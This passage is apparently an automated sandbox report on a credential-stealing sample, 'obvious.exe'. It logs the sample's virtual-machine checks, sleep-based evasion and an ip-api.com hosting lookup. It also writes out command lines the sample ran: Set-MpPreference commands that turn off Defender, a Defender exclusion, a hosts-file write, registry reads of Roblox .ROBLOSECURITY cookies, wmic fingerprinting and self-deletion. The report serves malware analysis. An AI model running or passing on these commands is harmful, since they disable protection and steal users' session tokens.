                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                        Source: C:\Users\user\Desktop\obvious.exe | Memory allocated: 12F5F800000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\obvious.exe | Memory allocated: 12F79220000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 597281
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 597172
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 597047
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596937
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596828
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596717
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596609
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596500
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596362
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596234
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596125
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 596016
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595906
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595796
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595687
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595575
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595467
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 595063
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594922
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594813
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594688
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594578
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594469
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594344
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594234
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594125
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 594013
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593906
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593797
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593684
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593578
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593469
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593344
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593234
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593123
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 593014
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592906
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592797
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592688
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592563
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592438
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592328
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592219
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 592094
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 591984
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 591875
                        Source: C:\Users\user\Desktop\obvious.exe | Thread delayed: delay time: 591766
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\obvious.exe | Window / User API: threadDelayed 6143
                        Source: C:\Users\user\Desktop\obvious.exe | Window / User API: threadDelayed 3699
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3963
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5835
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2997
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 377
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4996
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1629
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4241
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1792
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2889
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 999
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -30437127721620741s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -597281s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -597172s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -597047s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596937s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596828s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596717s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596609s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596500s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596362s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596234s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596125s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -596016s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595906s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595796s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595687s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595575s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595467s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -595063s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594922s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594813s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594688s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594578s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594469s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594344s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594234s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594125s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -594013s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593906s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593797s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593684s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593578s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593469s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593344s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593234s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593123s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -593014s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592906s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592797s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592688s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592563s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592438s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592328s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592219s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -592094s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -591984s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -591875s >= -30000s
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568 | Thread sleep time: -591766s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 | Thread sleep count: 3963 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 | Thread sleep count: 5835 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 | Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 | Thread sleep count: 2997 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 | Thread sleep count: 377 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 4996 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 1629 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 | Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep count: 4241 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep count: 1792 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 | Thread sleep count: 2889 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 | Thread sleep count: 999 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852 | Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: obvious.exe, uGCIY.scr.0.dr | Binary or memory string: vboxtray
                        Source: uGCIY.scr.0.dr | Binary or memory string: vboxservice
                        Source: obvious.exe, uGCIY.scr.0.dr | Binary or memory string: qemu-ga
                        Source: uGCIY.scr.0.dr | Binary or memory string: vmwareuser
                        Source: obvious.exe, uGCIY.scr.0.dr | Binary or memory string: vmusrvc
                        Source: uGCIY.scr.0.dr | Binary or memory string: vmwareservice+discordtokenprotector
                        Source: uGCIY.scr.0.dr | Binary or memory string: vmsrvc
                        Source: uGCIY.scr.0.dr | Binary or memory string: vmtoolsd
                        Source: uGCIY.scr.0.dr | Binary or memory string: vmwaretray
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareservice
                        Source: obvious.exe, 00000000.00000002.2322536047.0000012F5F8B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\obvious.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\obvious.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\obvious.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
                        Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Users\user\Desktop\obvious.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
